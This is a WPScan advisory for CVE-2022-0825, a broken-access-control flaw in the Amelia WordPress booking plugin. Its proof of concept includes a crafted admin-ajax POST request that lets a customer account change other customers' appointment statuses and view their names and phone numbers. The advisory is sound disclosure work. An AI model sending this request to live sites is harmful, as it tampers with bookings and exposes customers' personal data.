WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Amelia < 1.0.49 - Customer+ Arbitrary Appointments Status Update

Description

The plugin does not have proper authorisation when managing appointments, allowing any customer to update other's booking status, as well as retrieve sensitive information about the bookings, such as the full name and phone number of the person who booked it.

Proof of Concept

1. Make a booking to become customer
2. Login to WordPress with the customer account and make the following request (the ameliaNonce can be retrieved via "wpAmeliaNonce" under the Amelia dashboard)

POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments/status/2&ameliaNonce=e9ff5220c4 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=utf-8
Content-Length: 711
Connection: close
Cookie: [customer+ cookies]

{"status": "approved","packageCustomerId": null}

Affects Plugins

ameliabooking
Fixed in version 1.0.46

References

CVE
CVE-2022-0825
URL
https://plugins.trac.wordpress.org/changeset/2693545

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Huli from Cymetrics

Submitter

Huli from Cymetrics

Submitter website
https://cymetrics.io
Verified

Yes

WPVDB ID
1a92a65f-e9df-41b5-9a1c-8e24ee9bf50e

Timeline

Publicly Published

2022-03-14 (about 6 months ago)

Added

2022-03-14 (about 6 months ago)

Last Updated

2022-04-11 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin